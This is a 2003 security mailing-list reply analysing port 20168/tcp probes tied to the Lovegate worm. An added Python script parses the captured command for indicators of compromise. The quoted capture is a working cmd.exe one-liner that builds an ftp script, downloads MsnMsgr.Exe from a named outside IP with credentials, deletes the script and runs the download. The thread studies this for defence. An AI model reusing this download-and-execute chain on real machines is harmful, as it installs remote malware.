Re: New Worm or Worm Variant?

From: Juri Haberland (juri_at_koschikode.com)
Date: 12/11/03

  • Next message: Harlan Carvey: "Re: Strange services.exe file"
    Date: Thu, 11 Dec 2003 15:15:01 +0100
    To: Charles Hamby <fixer@gci.net>
    Charles Hamby wrote:
    > I've been seeing a jump in 20168/tcp scans over the past week or so.
    > This port is commonly associated with the Lovegate worm. I recently
    > set up a port listener using Netcat to capture any output from probes
    > against a couple of my systems. Shown below are the results:
    >
    > echo open 211.26.130.118 >> wxtu.dll & echo USER noxe >> wxtu.dll &
    > echo noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get
    > MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll &
    > del wxtu.dll & start MsnMsgr.Exe

    [SNIP]

    > At first glance it looks like some sort of non-interactive FTP
    > session to download an exploit (MsnMsgr.Exe), but Googling for
    > wxtu.dll came up empty (so this could be anything from a real .dll to
    > a renamed executable in my mind). A couple of questions for the
    > world at large:

    [SNIP]

    > 2) Any theories on wxtu.dll? Since I can't get a hold of the malware
    > to analyze it, I'm really guessing at this point. MsnMsgr.Exe seems
    > to be the exploit itself, and it appears to be using something like
    > FTPCOM to do a non-interactive FTP session, but wxtu.dll could be
    > anything from a real .dll file to a renamed executable. Ideas?

    My theory is as follows:
    Something on the target machine (whatever it was - possibly some kind of
    worm) opened port 20168/tcp and bound a shell to it. What you are seeing
    is someone connecting to this remote shell and issuing some commands. These
    commands echo some ftp commands into a previously nonexistent file
    called wxtu.dll, then run ftp in non-interactive mode to download
    MsnMsgr.Exe, which might be just something like BackOrifice, and then
    delete the wxtu.dll file.

    So the wxtu.dll file is just a text file created by the commands that
    you captured - the real problem is: what opened port 20168/tcp on that
    machine?

    Cheers,
    Juri
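The reasoning above can be mechanised: the captured one-liner is a chain of cmd.exe commands, so a script can split it on `&`, replay the `echo ... >> file` redirections to rebuild the file that ftp is later fed with `-s:`, and then read the reconstructed script the way `ftp -n` would (an `open`, a `user` whose password arrives on the following line, `binary`, `get`, `bye`). The following is an added example, not code from either poster; the captured command line from the post is embedded as constructed sample input, and the regexes encode my own assumptions about cmd.exe and ftp.exe syntax (`&`/`&&` as separators, `>`/`>>` redirection, `ftp -s:<file>`, `del`, `start`).

```python
"""Rebuild the ftp script that a captured cmd.exe one-liner writes with
`echo ... >> file`, and report what it would download and execute.

Added example for the thread above; the CAPTURED line is the one quoted in
the post, used here as constructed sample input.
"""
import re

CAPTURED = (
    "echo open 211.26.130.118 >> wxtu.dll & echo USER noxe >> wxtu.dll & "
    "echo noxe >> wxtu.dll & echo binary >> wxtu.dll & echo get "
    "MsnMsgr.Exe >> wxtu.dll & echo bye >> wxtu.dll & ftp -n -s:wxtu.dll & "
    "del wxtu.dll & start MsnMsgr.Exe"
)

# Assumption: cmd.exe runs '&'-separated commands in order; '&&' is
# conditional, but for reconstruction both are treated as separators.
ECHO_RE = re.compile(r"echo\s+(.*?)\s*(>>|>)\s*(\S+)$", re.I)
FTP_RE = re.compile(r"ftp\b.*-s:(\S+)", re.I)
DEL_RE = re.compile(r"del\s+(\S+)", re.I)
START_RE = re.compile(r"start\s+(.+)$", re.I)


def split_cmd(line):
    """Split a cmd.exe command line into its individual commands."""
    return [p.strip() for p in re.split(r"&&?", line) if p.strip()]


def reconstruct(line):
    """Replay echo redirections and note ftp/del/start commands.

    Returns (files, ftp_scripts, deleted, started) where files maps a file
    name to the lines echoed into it, in order.
    """
    files, ftp_scripts, deleted, started = {}, [], [], []
    for cmd in split_cmd(line):
        m = ECHO_RE.match(cmd)
        if m:
            text, op, name = m.groups()
            if op == ">":          # single '>' truncates the file first
                files[name] = []
            files.setdefault(name, []).append(text)
            continue
        m = FTP_RE.match(cmd)
        if m:
            ftp_scripts.append(m.group(1))
            continue
        m = DEL_RE.match(cmd)
        if m:
            deleted.append(m.group(1))
            continue
        m = START_RE.match(cmd)
        if m:
            started.append(m.group(1).strip())
    return files, ftp_scripts, deleted, started


def summarize_ftp_script(lines):
    """Read a reconstructed ftp script the way `ftp -n -s:file` consumes it."""
    info = {"server": None, "user": None, "password": None, "gets": []}
    expecting_password = False
    for ln in lines:
        parts = ln.split()
        if not parts:
            continue
        if expecting_password:
            # `user <name>` without a password makes ftp prompt for one;
            # the next script line is consumed as the answer.
            info["password"] = ln.strip()
            expecting_password = False
            continue
        verb = parts[0].lower()
        if verb == "open" and len(parts) > 1:
            info["server"] = parts[1]
        elif verb == "user" and len(parts) > 1:
            info["user"] = parts[1]
            if len(parts) > 2:
                info["password"] = parts[2]
            else:
                expecting_password = True
        elif verb in ("get", "recv", "mget"):
            info["gets"].extend(parts[1:])
    return info


def analyze(line):
    """Full report: every ftp script the line builds and runs, plus cleanup."""
    files, ftp_scripts, deleted, started = reconstruct(line)
    report = {"downloads": [], "deleted": deleted, "started": started}
    for script in ftp_scripts:
        summary = summarize_ftp_script(files.get(script, []))
        summary["script"] = script
        summary["script_deleted"] = script in deleted
        report["downloads"].append(summary)
    return report


if __name__ == "__main__":
    r = analyze(CAPTURED)
    for d in r["downloads"]:
        print(f"ftp {d['server']} as {d['user']}/{d['password']}: "
              f"get {d['gets']} via {d['script']} (deleted: {d['script_deleted']})")
    print("executed afterwards:", r["started"])
```

Running it against the captured line reports a download of MsnMsgr.Exe from 211.26.130.118 with credentials noxe/noxe, the script file wxtu.dll removed afterwards, and MsnMsgr.Exe started; the server address, credentials and fetched file name are exactly the indicators worth blocking or hunting for, while wxtu.dll itself is just the transient script, as the reply argues.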


